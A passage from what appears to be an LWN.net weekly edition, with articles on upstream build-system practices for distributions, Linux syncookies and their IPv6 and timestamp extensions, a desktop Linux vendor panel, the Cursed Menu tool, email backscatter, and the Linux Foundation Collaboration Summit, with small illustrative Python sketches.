their distribution's repository where it has been built with a shared
system library.

An easy choice for optional dependencies

Almost all distributions
prefer having a choice about the optional dependencies of a
package. Source-based distributions (like Gentoo and FreeBSD's ports
system) offer the same (or more) choices as the original project.  Gentoo's
USE flags or FreeBSD's knobs offer the user a choice of which
options will be enabled.  Binary distributions (like Debian or Red Hat)
might want to choose options to ensure that the final binary package does
not try to use dependencies that are not present in their official
repositories.

Again, if a project does not provide an easy way to control whether
some optional dependency is used, most distributions will either try
to work around that problem (by forcing cache discovery variables) or
change the build system themselves to get the choice to disable or
enable some dependency. This creates problems similar to the ones
discussed above: different distributions might use slightly different
changes, which may cause errors when merging them in, and they might
make errors that introduce new bugs.

As above, it's just a matter of providing a switch in the build system
(like a --disable-feature or --without-feature in
autoconf, or a WITHOUT_FEATURE knob for
make).  If the software has a plug-in infrastructure, binary
distributions might also just package the different plug-ins in different
packages, allowing the user to choose which ones to install.  Software
without plug-in structures might require building different packages with
different feature sets. For instance, if a program can use either OpenSSL
or GnuTLS as implementation of SSL/TLS layers, then the distribution might
create two packages, linking to one or the other. The user could then
choose between the two.

When some optional dependencies are discovered by the build system,
used if present and ignored if not, without a way to tell the software to
not build the optional feature that uses a library that is present on the
system, we're talking about an automagic dependency. Automagic
dependency is a term used to indicate when a package, optionally using
another, discovers its presence automatically, without allowing for the
user (or the downstream maintainer) to ask not to use it. This
kind of dependency is usually a problem just for source distributions, as
they build the software on users' systems, which may or may not have the
same configuration as the developer working on the build scripts. Binary
distributions on the other hand build their code in controlled
environments having only the stated dependencies installed. This might
actually confuse one of their developers into thinking that a given
dependency is mandatory, seeing it enabled in their local build, and
not finding an option to disable it.

In general, automagic dependencies should be avoided; a
soft-failure default usually serves the casual user just as well:
enable the dependency if found, disable it if not found, but
still give a way to tell the build system to disable it even when
found.  This preserves the behaviour intended by the original developers,
but also provides the control that (source) distributions want to have over
what is built.
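
The difference between an automagic dependency and a soft-failure default comes down to a three-way decision. The following Python sketch uses an invented resolve_feature() helper to model it; failing loudly when a feature is explicitly requested but its dependency is missing is an assumption of this sketch, not something every build system does.

```python
def resolve_feature(requested, found):
    """Decide whether an optional feature should be built.

    requested: True for --enable-feature, False for --disable-feature,
               None when the user expressed no preference.
    found:     whether the build system detected the dependency.
    """
    if requested is False:
        return False  # explicit "no" wins even if the library is present
    if requested is True:
        if not found:
            # Assumption: an explicit request that cannot be met is an error.
            raise RuntimeError("feature requested but dependency not found")
        return True
    return found  # soft-failure default: use it if it is there
```

An automagic build system is the same function with the first branch missing: when the library is present, nothing the packager passes can turn the feature off.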

Control over how the software is built

Another problem
shared by both binary and source distributions is having control over
how the software is built. For binary distributions this usually means
being able to impose options on the compiler, linker and other tools
during the package build process, so they respect their standard options.
For source distributions, this means allowing the user to choose the
options to provide to the compiler, linker, assembler and other build
tools, on a package-by-package basis.

This does not mean that the distributions want to force-feed extra
optimisations into software that might be fragile. This seems to be the
biggest concern of developers for not wanting to provide a way to change
the options used at compile time.

Distributions might want to reduce the optimisations used, or they might
just wish to enable (or disable) warnings to more easily spot potential
problems with their packages.  Distributions might also want to build
debug information, or remove debug messages, and so on.  There is a huge
number of possible combinations.

When the distributions want to reduce optimisation, that might be
because they need to create packages which work on lower-end architectures
not compatible with these optimisations.  Or they know that some of
these optimisations are not going to work with their environment.  They
might know that their version of the compiler does not support the
optimisation, or there could be other reasons.  Usually, the distribution
knows the best way to handle the package for their own environment.

This also leads to a compromise between upstream developers and downstream
maintainers: the former should provide their own default options and
optimisations, leaving a way to override these defaults as the
distributions see fit.  On the other hand, distributions should try their
best to determine whether any problems might be caused by their own
choice of optimisations.  Distributions should not expect upstream
developers to fix problems that they have caused with their choice of
optimisations.  This way, it's usually possible to keep the relationship
between upstream and downstream on good terms even when the set of
optimisations used is totally different.

More often than not, the problem is not the willingness of the
developers to provide an override, but rather actually
getting such an override to work. While most distribution developers
can fix these problems with relative ease, original developers would
probably want to facilitate the work of their distributors by checking
their own releases so that setting very minimal options to the
compiler will work as intended.  A common mistake is hard-setting
CFLAGS (or similar variables) in the configure.ac
file for autoconf (which otherwise has proper support for
user-chosen options).
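
The intended behaviour is simply "the project's default applies only when nobody has chosen otherwise". A minimal Python model of that rule follows; effective_cflags() is a hypothetical helper, and the "-g -O2" default is used here only because it is what autoconf commonly picks for GCC when CFLAGS is unset.

```python
import shlex


def effective_cflags(env, default="-g -O2"):
    """Return the compiler flags to use, honouring a user-supplied CFLAGS.

    env is a mapping such as os.environ; the default is used only when
    CFLAGS is not set at all, so an empty CFLAGS really means "no flags".
    """
    user_flags = env.get("CFLAGS")
    return shlex.split(default if user_flags is None else user_flags)
```

Hard-setting the variable in the build scripts is equivalent to ignoring env altogether, which is exactly the mistake described above.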

While we're talking about compiler optimisations it's important to note
that for some software, e.g. number crunching software (multimedia
applications, cryptography tools, etc.) enabling extra optimisations is
desirable.  Even so, it should be possible to disable extensive
optimisation.  These optimisations are usually fragile, and only work in
particular environments (compiler type and version, and architectures), so
having a way for distributors to decide what they actually want to enable
is a very real need.

But having a way to provide options to the compiler (C and C++,
respectively CFLAGS and CXXFLAGS) is not all that is
needed: most modern distributions might want access to the options
used by the linker (LDFLAGS) to change the kind of hash
tables to be generated, or to enforce particular security measures.  For
custom-prepared build systems, it's a common mistake to ignore this need,
or to support it in the wrong way.  Linker options should go before the
list of object files, which in turn should go before the list of libraries
to link to. This is another common mistake that distributors can fix with
relative ease, but it would be better taken care of by the original
developers, as it would require repeating the same steps for (almost) all
distributions.
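
The ordering rule can be illustrated with a small sketch.  The Python
helper below (link_command() is a hypothetical name, not part of any real
build system) assembles a link line with the user's LDFLAGS first, the
object files next, and the libraries last.  The flag values in the usage
note are only examples of what a distributor might pass.

```python
import shlex

def link_command(env, objects, libs, output, default_cc="cc"):
    """Assemble a link command in the order described above."""
    cmd = [env.get("CC", default_cc)]
    # User-chosen linker options come first, taken from the environment
    # rather than being hard-set by the build system.
    cmd += shlex.split(env.get("LDFLAGS", ""))
    cmd += ["-o", output]
    # Object files follow the linker options...
    cmd += list(objects)
    # ...and the libraries to link against go last.
    cmd += [f"-l{name}" for name in libs]
    return cmd
```

Called with LDFLAGS set to "-Wl,--hash-style=gnu -Wl,-z,relro", the
objects main.o and util.o, and the library m, this yields
cc -Wl,--hash-style=gnu -Wl,-z,relro -o app main.o util.o -lm.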

[This ends part 2 of this article.  Stay tuned for part 3, which will cover
the philosophical concerns and present some conclusions.]

		Improving syncookies


Back in 1997 TCP SYN flood attacks were all the rage among script
kiddies.  A SYN flood is a denial of service attack that uses up server
resources by initiating, but not completing, a connection.  Attacks via
this method remain a problem today, though
they are now more likely to be launched by sophisticated botnets
than by an individual. A first-line defense against SYN floods is
the syncookie. The syncookie was not designed for Linux specifically
but found its way into kernel 2.1.44 via a patch from Andi Kleen.


This long-time feature generated some recent discussion when a patch was
submitted adding syncookie support to IPv6. The patch has now been queued
for acceptance, but in the discussion along the way the community also
began to tackle some longstanding limitations of syncookies and reaffirmed
how relevant the feature continues to be.


To fully describe syncookies, some background on how TCP uses a
three-way handshake to establish a connection is in order. The first packet
of any TCP session received by the server is known as the SYN packet
because it carries the synchronize control flag. The SYN flag
indicates that its sender wishes to open a new connection. That flag
is only used during the opening sequence. The server responds with a
packet also containing the SYN flag because the connection needs to be
opened in both directions. This second packet also carries the ACK
flag and is known as the SYN-ACK. It serves to both open the
connection from the server to the client and to acknowledge receipt of
the opening packet from the other host. Finally, the client sends a
bare ACK packet to the server to acknowledge receipt of the
server-to-client SYN-ACK and the connection is then fully established.


During a SYN flood a server receives the first packet of the three-way
TCP handshake and responds with a SYN-ACK but no further data is ever
received from the initiating client. When the SYN-ACK is generated
most servers will also create an entry in the SYN queue. This queue is
the waiting area for half-open connections awaiting handshake
completion.  The attacker intentionally orphans those entries and
instead generates more SYN packets which in turn take up more entries
in the queue. The server needs to wait for a long timeout before
giving up and recovering the connection resources. During this time
the attacker can flood it with many more half-open connections.
Eventually the server runs out of resources and cannot accept any new
connections without dropping some, perhaps legitimate, connection from
the queue. Simple solutions such as placing a quota on the number of
partially open connections per peer or using dynamically adjusted
packet filters do not work because the SYN packets are easy to forge
with fake source addresses.


A syncookie allows the server to defer using up any resources
until the third packet in the three-way handshake has been
received. At that time the peer's address has been mildly
authenticated because the final packet in the handshake contains
a reference to the sequence number that was sent by the server in the
second packet. With this assurance, packet filters and resource quotas
keyed to the peer's address will again be useful defenses against
resource attacks.


The basic mechanism of the syncookie works by carefully manipulating
the initial sequence number value of the connection instead of
choosing it at random. Upon receiving a SYN the server carefully
encodes the vital information that would have been stored as state in
the SYN queue. This encoded information is cryptographically hashed
with a secret key to form the sequence number of the SYN-ACK and sent
to the client. The third packet of a legitimate handshake, which is
the ACK from the client back to the server, contains this sequence
number (plus one) in its acknowledgment number field. In this way all
the information necessary to fully open the connection is presented
back to the server without having to maintain state while the
handshake is being completed.
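
A minimal sketch of the idea, not the kernel's implementation, follows.
It assumes HMAC-SHA256 as a stand-in hash, a fixed example secret, and
three low bits reserved for encoded connection state; real syncookies also
mix in a slowly advancing time counter so that old cookies expire, which is
omitted here.  All function names are hypothetical.

```python
import hashlib
import hmac

SECRET = b"example-only-secret"   # assumption: a real server uses a random key
DATA_BITS = 3                     # low bits carrying encoded connection state
DATA_MASK = (1 << DATA_BITS) - 1
U32 = 0xFFFFFFFF
HASH_MASK = U32 ^ DATA_MASK       # the remaining 29 bits hold the hash

def _hash32(saddr, sport, daddr, dport, client_isn):
    """Keyed 32-bit hash over the values that identify this handshake."""
    msg = f"{saddr}:{sport}>{daddr}:{dport}#{client_isn}".encode()
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:4], "big")

def make_cookie(saddr, sport, daddr, dport, client_isn, data):
    """Build the SYN-ACK sequence number; nothing is stored on the server."""
    top = _hash32(saddr, sport, daddr, dport, client_isn) & HASH_MASK
    return top | (data & DATA_MASK)

def check_cookie(saddr, sport, daddr, dport, client_isn, ack_number):
    """Validate the final ACK; return the encoded data, or None if invalid.

    client_isn is the client's initial sequence number, which the server
    can recover from the ACK's own sequence number (minus one).
    """
    cookie = (ack_number - 1) & U32          # the ACK carries cookie + 1
    expected = _hash32(saddr, sport, daddr, dport, client_isn) & HASH_MASK
    if (cookie & HASH_MASK) != expected:
        return None
    return cookie & DATA_MASK
```

The server recomputes the hash from fields present in the final ACK, so a
matching acknowledgment number shows that the peer really did receive the
SYN-ACK sent to its claimed address.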


The major downside to syncookies is that they only have space to
encode the most basic of TCP handshake options. At the time of initial
syncookie deployment this was not a large problem because the only option
prominently in use at the time was the Maximum Segment Size (MSS)
option. This option is provided to help the peer avoid unnecessary
fragmentation by sending packets that the other end of the connection
knows a priori are too large to cross its network. This is exactly the kind
of information that is normally stored as state in the SYN queue. The
syncookie designers knew that this option was important to performance
and found 3 bits for it in the encoded syncookie. These bits are used to
approximate the real value of the option to one of 8 common values.
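
The approximation can be sketched as a table lookup.  The eight values
below are illustrative assumptions, not necessarily the table used by any
particular kernel; the point is only that a 3-bit index selects the largest
table entry that does not exceed the MSS the client advertised.

```python
import bisect

# Assumption: eight "common" MSS values in ascending order, for illustration.
MSS_TABLE = [64, 256, 512, 536, 1024, 1440, 1460, 4312]

def mss_to_index(mss):
    """Return the 3-bit index of the largest table entry <= mss."""
    index = bisect.bisect_right(MSS_TABLE, mss) - 1
    return max(index, 0)          # clamp values below the smallest entry

def index_to_mss(index):
    """Recover the approximated MSS from the index found in the cookie."""
    return MSS_TABLE[index]
```

Rounding down is the safe direction: the server may send slightly smaller
segments than necessary, but never ones larger than the client asked for
(except in the clamped case at the very bottom of the table).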


In the intervening years new options have come into prominence and
these are not syncookie compatible. The most important of these are the window scaling and Selective
Acknowledgment (SACK) options. These features respectively allow the
TCP congestion control window to grow beyond 64KB and be more
efficient in the case of minor packet losses from those large
windows. Without using these features it is impossible to get good
transfer rates on networks with large bandwidth or large latency. Many
household broadband links require at least the window scaling option
to fully utilize the network connection. Due to this limitation, and
the modest computation overhead of the cryptographic hash, the
Linux stack only resorts to syncookie based connections when the
number of half-open connections exceeds a high watermark controlled by
the net.ipv4.tcp_max_syn_backlog sysctl. These connections are less
featureful than normal connections but they are only resorted to when
the queue would otherwise require active pruning.


It turns out that the cookie mechanism is only implemented for
IPv4. Recently, Glenn Griffin posted patches that add IPv6 support
for syncookies. Andi Kleen, author of the original syncookie patch,
wondered if the mechanism should be continued at all, much less added
to IPv6:


Syncookies are discouraged these days. They disable too many 
valuable TCP features (window scaling, SACK) and even without them 
the kernel is usually strong enough to defend against syn floods
and systems have much more memory than they used to be.

So I don't think it makes much sense to add more code to it, sorry.


Andi's argument was three-pronged. His first point was about the
reduced abilities of cookie initiated connections as already described
in this article. Over time the value of these options has increased
and therefore the cost of using syncookies has increased too. His
second point was that Linux no longer uses all of the memory necessary
for a full connection until the new connection is fully open. Instead
it uses a "minisock" for that period. The minisock is a 96 byte
struct tcp_request_sock structure holding the minimum state
necessary to get the connection fully opened. The fully established
struct tcp_sock is 1616 bytes. Both structure size
measurements refer to a 64-bit kernel. Finally, Andi points out that
the queue management routines for an overloaded SYN queue are more
sophisticated now than the dumb head drop algorithm that was in place
when syncookies were first deployed. The suggestion was that in
aggregate these advances might make Linux robust enough without
syncookies that they could be removed altogether.
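
To put those structure sizes in perspective, a little arithmetic helps.
The sketch below uses the two sizes quoted above and, as an assumption, a
queue of 1024 half-open connections; the helper name is hypothetical.

```python
REQUEST_SOCK_BYTES = 96     # minisock size quoted above (64-bit kernel)
TCP_SOCK_BYTES = 1616       # full socket size quoted above (64-bit kernel)

def queue_bytes(entries, bytes_per_entry):
    """Memory pinned by a queue of half-open connections."""
    return entries * bytes_per_entry

backlog = 1024              # assumed queue length
mini = queue_bytes(backlog, REQUEST_SOCK_BYTES)
full = queue_bytes(backlog, TCP_SOCK_BYTES)
print(f"minisocks: {mini} bytes, full sockets: {full} bytes")
```

With these numbers a full queue of minisocks pins 96KB, where full sockets
would have pinned roughly 1.6MB, a reduction by a factor of almost 17.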


Instead of engaging in a theoretical discussion some readers set up and
ran their own experiments. One of the best parts of the Linux
community is its tendency to put real data behind its
arguments. While there is often disagreement over the realism of the
measured scenarios, the data points always help us better understand
the dynamics of kernel code.


Willy Tarreau: My tests on an AMD LX800 with max_syn_backlog at 63000 on an HTTP
reverse proxy consisted in injecting 250 hits/s of legitimate traffic
with 8000 SYN/s of noise.[..] Without SYN cookies, the average
response time was about 1.5 second and unstable (due to retransmits),
and the CPU was set to 60%. With SYN cookies enabled, the response
time dropped to 12-15ms only, but CPU usage jumped to 70%. The
difference appears at a higher legitimate traffic rate.


Ross Vandegrift:
Under no SYN flood, the server handles 750 HTTP requests per second,
measured via httping in flood mode. With a default tcp_max_syn_backlog
of 1024, I can trivially prevent any inbound client connections with 2
threads of syn flood.  Enabling tcp_syncookies brings the connection
handling back up to 725 fetches per second.


This data compellingly supports the continued value of the syncookie
and that position seems to have won the day. The IPv6 syncookie
patches are now queued within the network 2.6.26 development tree. 


However, the biggest news is probably that this discussion brought
renewed energy to the problem of lost handshake options. Florian
Westphal and Glenn Griffin have recently presented a solution to the
most damaging aspect of that problem too.


Their solution is to leverage
the echoed TCP timestamp option in a way similar to the way classic
syncookies leverage the echoing of the SYN-ACK sequence number in the
subsequent ACK. The timestamp option was introduced with RFC 1323 and
is widely deployed on modern Linux, Windows, and FreeBSD (including OS
X) systems. Its main purpose is to be able to increase the frequency of round
trip time measurements in the presence of large congestion control
windows.


Using the timestamp to preserve the window scale and SACK option
values requires modifying the timestamp of the SYN-ACK packet to
include the state necessary to support them. During a normal handshake the
client will echo the modified 
timestamp value of the SYN-ACK packet back to the server as part of
the timestamp option on the third packet of the handshake and thus
propagate the SACK and window scale information without keeping any
state on the server.


In order to make room in the timestamp for this new information the
least significant 9 bits of the timestamp are shaved off. The encoded
representations of the window scale and SACK options are then
transferred back and forth at the minor cost of reduced granularity of
TCP timestamps during the handshake exchange. With this approach,
timestamps are only accurate to within 512 jiffies.
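
The bit manipulation can be sketched as follows.  The layout is an
assumption made for illustration (two 4-bit window scale values and one
SACK bit packed into the 9 low bits), and the function names are
hypothetical; the patch itself should be consulted for the real encoding.

```python
TSBITS = 9                       # low bits taken over for option state
TSMASK = (1 << TSBITS) - 1

def encode_timestamp(now, snd_wscale, rcv_wscale, sack_ok):
    """Replace the low 9 bits of the current timestamp with option state."""
    options = (snd_wscale & 0xF) | ((rcv_wscale & 0xF) << 4) | (int(sack_ok) << 8)
    ts = (now & ~TSMASK) | options
    if ts > now:                 # never advertise a timestamp from the future
        ts -= 1 << TSBITS
    return ts & 0xFFFFFFFF

def decode_timestamp(echoed):
    """Recover the option state from the timestamp echoed by the client."""
    options = echoed & TSMASK
    return options & 0xF, (options >> 4) & 0xF, bool(options >> 8)
```

Under this assumed layout, two handshakes that both use window scale
values of 6 with SACK enabled produce different timestamps at different
times, but the low nine bits are 0x166 in each case.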


Below are two different TCP handshakes completed with syncookies and
the timestamp patch. Note that the lowest bits of the SYN-ACK
timestamp are the same in each handshake even at different points in
time because each handshake uses the same SACK and window scaling
options. As a result the timestamp values in
each SYN-ACK are different but the lower nine bits share the same 0x166
value.


While there is no guarantee that the timestamp option will be
supported by every TCP peer, timestamps are widely deployed on the most
common operating systems. Additionally, because timestamps, window
scaling, and selective acknowledgments are all features related to
high-latency, high-bandwidth networks, one would be unlikely to find an
implementation that supported only a subset of these options.


One shortcoming of the scheme is that it is not general enough to be
future-proof as new handshake based options may continue to be
deployed. At this time the MSS, SACK, window scaling, and timestamp
options are the only handshake options seen with any regularity other
than the NOP option which is just used for packet alignment. However,
the whole point of an extensible option scheme is to leave room for
future improvements. The IANA registry that records option values was
last updated in February 2007 to reserve option code 27 for use with
Experimental RFC 4782 "Quick Start for TCP and IP". Only time will
tell if that particular option will be the next challenge to the
syncookie scheme or if something else will rise first.


The timestamp patch has only been posted very recently, and there has
been little discussion of it beyond the developers who worked directly
on it. It is not clear whether or not it will be accepted right
away into the mainline, but it certainly seems to address a well known
core problem with the syncookie at a minor cost.


With the updates for IPv6 and modern TCP option schemes syncookies
appear primed to keep providing sweet relief in their somewhat
esoteric networking security niche. Perhaps they will keep chugging
away for another 10 years without having to be re-baked.

		Discussing desktops at the Collaboration Summit


Your editor is typing this from the Linux Foundation's collaboration
summit, currently in progress in Austin, Texas.  The day's agenda includes
giving a talk on the state of the kernel during the evening reception;
beer-fueled hecklers would appear to be in your editor's near future.
The first day, though, included a rather more sober panel on the state of
the Linux desktop which revealed some interesting thoughts on where things
are going.


This panel, moderated by Steven Vaughan-Nichols, featured John Hull from
Dell, David Liu (gOS), Jim Mann (HP), Timothy Chen (Via), Kelly Fraser
(Xandros), Grégoire Gentil (Zonbu), Ellis Wang (Asus), Debra
Kobs-Fortner (Lenovo), and a representative from Everex whose name your
editor did not catch.  Together, they represented a wide range of
industries, from component makers and operating system vendors to providers
of complete systems.  They take different approaches to the Linux desktop,
but they are all optimistic about where it is heading - though some are
more so than others.


So how are these vendors doing with desktop Linux?  While all of the
vendors were optimistic, some were more guarded than others.  Dell states
that sales have "met expectations," but are aimed mostly at niche markets
so far.  There is, they say, a lot of interest in emerging markets, where
users can start with Linux from the outset and do not have to migrate from
other platforms.  HP was also moderate in its enthusiasm, saying that its
sales are "right about at the industry average."  Lenovo was cautiously
optimistic; their ThinkPad offerings are targeted at business users, which is
a slower market to get into.  According to Lenovo, most of their
Linux-based sales are custom products designed for specific businesses.


Rather more enthusiasm came from gOS, the company which supplied the
distribution for Wal-Mart's low-end PC.  Sales, they say, are "very good."
Asus is clearly happy with the success of the Eee PC.  That success, they
say, comes from the effort put into designing a complete solution for
users, with features like quick booting and solid-state storage: "you drop
it, it still works."  Everex says that "sales are brisk"; the company is
pleased and will continue to offer Linux-based products - including the
"MyMiniPC", a small system aimed specifically at MySpace users.  Via's
components are found in a number of small Linux systems, including the Eee
PC, so Via is happy.

It's too early for real results from Zonbu, which is
trying to use Linux-based systems for a "computers as a service" business
model.  But, says Zonbu, Linux is the best platform for companies trying
new models.  Finally, Xandros also is optimistic, especially about "new
form factors" for the desktop, a place where Microsoft, they say,
"stumbled."


The panel was asked what the development community can do to help these
desktop businesses; in response, Arjan van de Ven piped up from the
audience, asking what the companies are doing for the kernel community.
From Lenovo, the word is that developers can work to get drivers into
enterprise distributions as soon as possible.  That request, of course,
gets back to the tension
between enterprise distributions and the desire for current code; this
subject was not pursued further here, though.  Dell would like to see more 
collaboration with other vendors in the production of drivers.  The Via
representative came straight out and said that "we don't do much" to
support the community, but insisted that their intentions are good.  He
said that community support is hard for a Taiwanese company to do, but
didn't say why.  Via does plan to open a community site at linux.via.com.tw with driver code and
more, but this site is not yet in place.




Support of users came up briefly.  The HP representative said that the
company expects distributors to provide backup support, but the first call
will always go to the vendor of the hardware.  That can be a problem,
especially for the small devices which are seeing so much success at the
moment; a single support call can wipe out any profit on the sale of one of
those systems. Selling "constrained systems" which only do a few things
helps; but, earlier, Mr. Mann had also talked about the difficulty of
installing additional applications on these systems.  There would appear to
be some tension between providing a truly open device and
keeping support costs down.  The word from Asus is
that a system like the Eee PC generates a lot of relatively trivial calls -
things like "how do I search on the web?"  So there is a real need to train
users which has little to do with Linux itself.


On the subject of applications, the gOS representative discussed a strategy
of putting as much as possible on the web.  The problem with local
applications which look like Microsoft products is that users then expect
those applications to behave like Microsoft products.  It is better to have
something which is obviously different and, presumably, better.  Xandros
called for better style guides and consistency throughout the interface;
clones of other products are not what the market needs.  On the HP side,
the biggest request was "don't make people open a terminal."  


Perhaps the most amusing comment came from the Via representative, who
described a "Maddog/Shuttleworth" choice.  He asserted that his
grandparents would find Jon "maddog" Hall (who was in the audience) to be a
rather scary presence, while Mark Shuttleworth comes across as a friendly
gentleman.  Our interfaces, he says, need to look more like Mark
Shuttleworth.  Your editor, who has always found Maddog to be one of the
friendliest people he knows, does not entirely buy into this analogy.  But
perhaps there is something to be said for clean-shaven interfaces.


There was some talk of asking suppliers to provide hardware which is
supported by free software.  Perhaps the most telling comment came from
Lenovo, which, apparently, has been asking for Linux-supported hardware
"for a number of years."  Free drivers are not a priority, though; the
first priority is just having things work.  So there is still some work to
be done in this direction.


Arguably the most interesting theme which came from this discussion - and
from the first day of the summit as a whole - is that nobody is really
pushing all that hard to get Linux into traditional desktop settings.  The
real action at the moment would appear to be in small devices like the Eee
PC.  These "greenfield" areas where there is no established presence to
compete against offer vendors a market where they are not trying to migrate
users away from other products.  They would appear to be convinced that
Linux can be a strong contender there - maybe the strongest.  So soon we
may truly see the year of the Linux desktop - for specific types of
"desktop."

		Design simple menus with Cursed Menu


The Cursed Menu
project implements a terminal-based menu system via the
Curses terminal control library:


Cursed Menu aims to create an ncurses based menu system for character based sessions. This menu program could be used to create user, system administration, or utility menus for clients connecting with text based clients such as telnet, ssh, or rlogin.


Version 1.0.3 of Cursed Menu was recently
announced.  Despite being unable to find any documentation whatsoever
on the project page, your editor decided to try out the software.
The code was
downloaded as a tar.bz2 file, uncompressed and untarred.
The configure script was run on a system running Ubuntu 7.04.
There was one dependency issue that was fairly easily solved by
installing the libncurses5-dev package.  After fixing that, the
software configured and built correctly.


The next logical action was to take a look at
the source code in the src/ subdirectory.  The source files were mostly
.cc and .hh, indicating a C++ project.  The cursedmenu binary was run and
a blue curses screen similar to the example
screenshot showed up.  Navigating through the menus was simply
a matter of using the arrow keys for movement and the Enter key for
selecting an item.  A longer description of the item under the cursor
showed up in the lower left corner of the terminal screen.


A little more digging through the code revealed the configuration
system for Cursed Menu.  Each menu has an associated .cmd file;
here's what the default main menu .cmd file looks like:


Customizing the .cmd file was fairly intuitive: shell commands
were added to the ItemExec lines and were run when the menu item was
selected.  The cursedmenu binary picked up the changes in the .cmd
file without recompilation.


Cursed Menu provides a quick and easy way to control simple shell
scripts and could be useful for many purposes.
The project could really benefit from some basic documentation;
a simple README file with a description of the available commands
would be a good start.  Despite this lack, the code seems to
function nicely and can be put to use as-is.

		Backscatter increase clogs inboxes


Backscatter, also known as blowback, is the result of a spammer forging the
sender address on an email that is sent to a non-existent address.  Many
mail servers do not reject invalid addresses when they receive the email
and instead generate a bounce message sometime later.  The unfortunate
victim, then, is the one whose address was forged as the sender.  Sometimes,
hundreds or thousands of bounce messages can be generated which flood the
inbox of an innocent bystander.


Backscatter seems to be on the rise recently; the LWN inbox has seen a huge
increase in the number of bounces over the last week or so.  Some Google
domains may be contributing to the problem, but that cannot explain all of
it.  One basic problem is that many mail servers are generating the bounce
messages after accepting mail for invalid addresses, rather than
rejecting it while the SMTP transaction is still in progress.


When a mail server gets a connection from a sending machine, it gets several
pieces of information about the email in addition to its contents.  Both a
"from" and "to" address are included in this extra information, which is
usually called the envelope, for obvious reasons.  After receiving each
piece of the envelope, a mail server has the opportunity to reject the
message.  Typically this isn't done for valid-looking sender addresses, except in limited
blacklist situations, but it certainly can and should be done when the
recipient address is invalid.
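
As a rough illustration of rejecting at SMTP time, the Python sketch below
answers a RCPT TO command against a list of known local mailboxes.  The
mailbox list and the handle_rcpt() name are hypothetical; the reply codes
(250 for success, 550 for an unavailable mailbox) are the standard SMTP
ones.

```python
# Assumption: the set of valid local mailboxes is known to the SMTP listener.
VALID_RECIPIENTS = {"editor@example.com", "postmaster@example.com"}

def handle_rcpt(recipient, valid=VALID_RECIPIENTS):
    """Answer an SMTP RCPT TO command while the transaction is still open."""
    if recipient.lower() in valid:
        return 250, "2.1.5 Recipient OK"
    # Refusing here leaves the problem with the connecting machine; no
    # bounce message is ever generated toward the (possibly forged) sender.
    return 550, "5.1.1 No such user here"
```

Because the refusal happens inside the SMTP conversation, any error report
is produced by the sending side, which knows who really submitted the
message.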


Due to a variety of mail server configuration issues, many mail servers do
not avail themselves of the opportunity to reject mail for invalid
recipients.  Instead, they
defer their decision until sometime later.  Servers that relay mail will
not know whether some of the addresses they relay are valid, while other servers
(qmail for example) separate the SMTP conversation program from the local
delivery program for security reasons and thus do not have that information
available.  Other valid or semi-valid reasons exist, but once the mail has
been accepted, the proper means of indicating a bad address is no longer available.


In the days before spam—remember those?—a mail server could
generally trust that the sender address in the envelope was the real
sender.  So an incorrectly addressed email could be bundled up in a bounce
message and sent to the sender.  If the sender address is valid, it is
very little different than a bounce that is generated by the sender's
machine when the mail gets rejected at SMTP time.  Unfortunately, the
majority of sender addresses these days are forged.


But spammers don't want to use just any forged address; they want to use
something that is valid or appears valid.  Mail servers have gotten better
at testing sender addresses for validity before accepting mail from them.
So, where does an enterprising spammer get a valid email address?  They
pick one at random from their list of "500,000 guaranteed opt-in email
addresses" that they bought from some other miscreant.  They use those
lists both as targets for their spam and as a source of sender
addresses.


As might be guessed, the SpamAssassin
mailing lists have been discussing the problem recently, especially
trying to find ways to reduce the amount received.  SpamAssassin does have
the VBounce
plugin to recognize bounce messages.  By default, it doesn't increase
the score of bounces by much as it is meant to be used with procmail to put
bounces in a 
separate place from spam. 


Another idea floated on the list is to publish SPF or DKIM records for a
domain.  The belief is that spammers avoid forging addresses in those
domains because doing so is likely to
cause their message to be immediately classified as spam.  Anecdotal
evidence seems to indicate that backscatter can be significantly reduced in
this way.


		Notes from the Collaboration Summit


Your editor has certainly attended no shortage of Linux-related
conferences.  Many of those are developer conferences, which are invariably
interesting events.  Others are oriented around marketing or outreach, with
rather more variable results.  The
Linux Foundation's Collaboration Summit, which ran from April 8
to 10, is unique, though, in that it attracts representatives from
throughout the Linux ecosystem.  Developers are not in short supply (though
it seemed like there were fewer than last year), but those developers spend
three days talking with corporate executives, industry analysts, and,
crucially, a number of high-profile users.  This mixture of people creates
a very different dynamic which supports a whole range of interesting
conversations.


One of the first events was the kernel developers' panel, moderated by your
(normally rather immoderate) editor.  Panelists James Bottomley, Matt
Domsch, Dave Jones, Christoph Lameter, Ted Ts'o, Arjan van de Ven, and
Chris Wright discussed a variety of topics, including kernel quality
(getting better), code review, development process participation, hardware
support, and more.  Your editor was not able to take notes from the panel;
perhaps the best report which has come up so far can be found in this
InformationWeek article by Charles Babcock.  


IDC analyst Al Gillen spent half an hour going through a bunch of
chart-heavy slides on the future of Linux in the marketplace.  Overall,
things look good, in that a market worth $20 billion in 2007 is
expected to go up to $50 billion in 2011.  There were lots of
associated details which have been reported elsewhere.  One interesting
aspect was watching how the analyst trade copes with "non-paid" Linux
deployments - which, according to Mr. Gillen, make up 43% of the total.  There
was talk about how "monetizing" these deployments is a challenge for those
looking to make money in the Linux marketplace.  He expressed surprise at
just how many companies are confident in their ability to support Linux
deployments on their own.  But he also talked about just how important that
non-paid base is for the support of the entire ecosystem.  Non-paid
deployments may be a "challenge" to those who would prefer to be paid, but
their absence would be a rather larger challenge.


There was an echo of this insight when Red Hat CTO Brian Stevens talked.
One of Red Hat's goals, he says, is to give customers the immense value
that goes with a "zero cost to exit" offering.  There is no RHEL lock-in.
To that end, he says, the folks at CentOS have done Red Hat a great favor.
Brian also talked about the difference between the old "selling the
distribution" business model, which gave Red Hat an incentive to put lots
of shiny new things into each release, and the current model, which puts
the focus on continuity instead.  Since Red Hat's customers have already
paid for the next release, Red Hat doesn't need to add lots of cool new
features to encourage them all to upgrade.


He then spent the rest of his talk on the various cool new features the
company is working on, including messaging, realtime
support, and more. 


Marten Mickos, once CEO of MySQL and now a vice president at Sun
Microsystems, gave a talk which was intended to make listeners feel good
about Sun and its plans for free software.  It bothers him, he says, when
people ask whether MySQL will remain committed to Linux; it strikes him as
a demonstration of uncertainty about the future of Linux in general.  That
uncertainty is unnecessary; Linux's future is strong, regardless of what
MySQL does.  But MySQL (and Sun) do
remain committed to Linux as a platform; the era of monolithic computing
platforms is over, and companies have to support customers who will make
their own choices at each level in the stack.  So LAMP as an "architecture
of participation" will remain supported by Sun well into the future.


An industry panel on "the state of Linux" was a useful view into how some
